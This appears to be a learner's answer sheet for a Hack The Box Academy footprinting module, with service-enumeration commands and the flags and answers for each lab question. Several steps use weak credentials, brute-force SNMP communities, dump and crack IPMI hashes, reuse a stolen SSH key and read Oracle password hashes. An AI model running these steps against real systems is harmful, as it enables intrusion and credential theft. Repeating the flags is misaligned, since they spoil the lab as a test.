Footprinting
Which version of the FTP server is running on the target system? Submit the entire banner as the answer.
nmap -sV -sC -p21 10.129.202.5
Infreight FTP v1.1
Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer.
nmap --script=/usr/share/nmap/scripts/ftp-anon.nse 10.129.202.5
ftp 10.129.202.5
(log in as anonymous, which the ftp-anon script reports as allowed)
get flag.txt
cat /home/htb-ac633072/flag.txt
HTB{b7skjr4c76zhsds7fzhd4k3ujg7nhdjre}
What version of the SMB server is running on the target system? Submit the entire banner as the answer.
nmap -sC -sV -p 139,445 10.129.202.5
Samba smbd 4.6.2
What is the name of the accessible share on the target?
rpcclient -U "" 10.129.202.5
(hit enter for password)
srvinfo
netshareenumall
sambashare
(the only one without a $)
Connect to the discovered share and find the flag.txt file. Submit the contents as the answer.
smbclient //10.129.202.5/sambashare
ls
cd contents
get flag.txt
cat /home/htb-ac633072/flag.txt
HTB{o873nz4xdo873n4zo873zn4fksuhldsf}
Find out which domain the server belongs to.
rpcclient -U "" 10.129.202.5
enumdomains
DEVOPS
Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer.
netsharegetinfo sambashare
InFreight SMB v3.1
What is the full system path of that specific share?
/home/sambauser
Enumerate the NFS service and submit the contents of the flag.txt in the "nfs" share as the answer.
nmap -sV -sC -p- --script='nfs*' 10.129.202.5
mkdir nfs
sudo mount -t nfs 10.129.202.5:/var/nfs ./nfs/ -o nolock
cd nfs
cat flag.txt
HTB{hjglmvtkjhlkfuhgi734zthrie7rjmdze}
Enumerate the NFS service and submit the contents of the flag.txt in the "nfsshare" share as the answer.
mkdir nfsshare
sudo mount -t nfs 10.129.202.5:/mnt/nfsshare ./nfsshare/ -o nolock
cd nfsshare/
cat flag.txt
HTB{8o7435zhtuih7fztdrzuhdhkfjcn7ghi4357ndcthzuc7rtfghu34}
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
dig ns inlanefreight.htb @10.129.91.31
ns.inlanefreight.htb.
Identify if it's possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...})
dig axfr internal.inlanefreight.htb @10.129.91.31
HTB{DN5_z0N3_7r4N5F3r_iskdufhcnlu34}
What is the IPv4 address of the hostname DC1?
dig axfr internal.inlanefreight.htb @10.129.91.31
10.129.34.16
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
dnsenum --dnsserver 10.129.197.206 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/fierce-hostlist.txt dev.inlanefreight.htb
win2k.dev.inlanefreight.htb
Enumerate the SMTP service and submit the banner, including its version as the answer.
nmap -sV -sC -p25 10.129.122.123
InFreight ESMTP v2.11
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
msfconsole
use auxiliary/scanner/smtp/smtp_enum
set USER_FILE <file in resource>
set RHOSTS 10.129.122.123
run
robin
Figure out the exact organization name from the IMAP/POP3 service and submit it as the answer.
curl -k -v 'pop3s://10.129.122.123' --user robin:robin
InlaneFreight Ltd;
What is the FQDN that the IMAP and POP3 servers are assigned to?
curl -k -v 'pop3s://10.129.122.123' --user robin:robin
dev.inlanefreight.htb
Enumerate the IMAP service and submit the flag as the answer. (Format: HTB{...})
openssl s_client -connect 10.129.122.123:imaps
HTB{roncfbw7iszerd7shni7jr2343zhrj}
What is the customized version of the POP3 server?
openssl s_client -connect 10.129.122.123:pop3s
InFreight POP3 v9.188
What is the admin email address?
openssl s_client -connect 10.129.122.123:imaps
1 LOGIN robin robin
1 LIST * *
1 SELECT DEV.DEPARTMENT.INT
1 FETCH 1 all
Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})
openssl s_client -connect 10.129.122.123:imaps
1 LOGIN robin robin
1 LIST * *
1 SELECT DEV.DEPARTMENT.INT
1 FETCH 1 all
1 FETCH 1 body[text]
HTB{983uzn8jmfgpd8jmof8c34n7zio}
Enumerate the SNMP service and obtain the email address of the admin. Submit it as the answer.
snmpwalk -v2c -c public 10.129.42.195
What is the customized version of the SNMP server?
snmpwalk -v2c -c public 10.129.42.195
InFreight SNMP v0.91
Enumerate the custom script that is running on the system and submit its output as the answer.
snmpwalk -v2c -c public 10.129.42.195
HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}
Enumerate the MySQL server and determine the version in use. (Format: MySQL X.X.XX)
nmap -sC -sV 10.129.100.169
MySQL 8.0.27
During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?
mysql -u robin -probin -h 10.129.94.44
show databases;
use customers;
show tables;
select * from myTable where name='Otto Lang';
Enumerate the target using the concepts taught in this section. List the hostname of MSSQL server.
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
ILF-SQL-01
Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.
mssqlclient.py -p 1433 backdoor@10.129.201.248 -windows-auth
select name from sys.databases
Employees
What username is configured for accessing the host via IPMI?
msfconsole
use auxiliary/scanner/ipmi/ipmi_version
use auxiliary/scanner/ipmi/ipmi_dumphashes
admin
What username is configured for accessing the host via IPMI?
take hash from earlier scan and save into /tmp/ipmi
hashcat -m 7300 /tmp/ipmi /usr/share/wordlists/rockyou.txt
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
sudo nmap -sV -sC -v 10.129.116.210
ftp -p 10.129.116.210 2121
ceil // qwer1234
cd .ssh
get id_rsa
chmod 0600 id_rsa
ssh -i id_rsa ceil@10.129.116.210
find / -type f -name '*flag*' 2>/dev/null
cat /home/flag/flag.txt
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}
Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.
sudo nmap -sV -sC -v 10.129.75.147
showmount -e 10.129.75.147
mkdir mount
sudo mount -t nfs 10.129.75.147:/TechSupport ./mount/ -o nolock
cd mount
ls -lisa
cat ticket4238791283782.txt (get alex username and password)
smbclient --user=alex -L //10.129.75.147
smbclient --user=alex //10.129.75.147/devshare
ls
get important.txt (get sa and password)
xfreerdp /u:administrator /p:'87N1ns@slls83' /v:10.129.202.41 (use sa password with builtin administrator account)
lnch7ehrdn43i7AoqVPK4zWR
Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.
onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt 10.129.202.20
#backup
#community is backup
braa backup@10.129.202.20:.1.3.6.*
10.129.202.20:82ms:.80:tom NMds732Js2761
openssl s_client -connect 10.129.202.20:imaps
#find email with ssh key (log in with the tom credentials from the braa output)
1 LOGIN tom NMds732Js2761
1 SELECT INBOX
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
1 FETCH 1 all
1 LIST * *
1 FETCH 1 body[text]
#found ssh key
ssh -i tom_id_rsa tom@10.129.202.20
cat .bash_history (shows mysql)
mysql -u tom -p
use users;
select * from users where username like 'HTB';
cr3n4o7rzse7rzhnckhssncif7ds
Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.
sudo nmap -p1521 -sV 10.129.68.254 --open --script oracle-sid-brute
./odat.py all -s 10.129.68.254
[+] Accounts found on 10.129.68.254:1521/sid:XE:
scott/tiger
#to fix sqlplus error while loading libraries
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
sqlplus scott/tiger@10.129.68.254/XE
select table_name from all_tables;
select * from user_role_privs;
#no privs but can try to login as sysdba
sqlplus scott/tiger@10.129.68.254/XE as sysdba
select name,password from sys.user$;
DBSNMP E066D214D5421CCC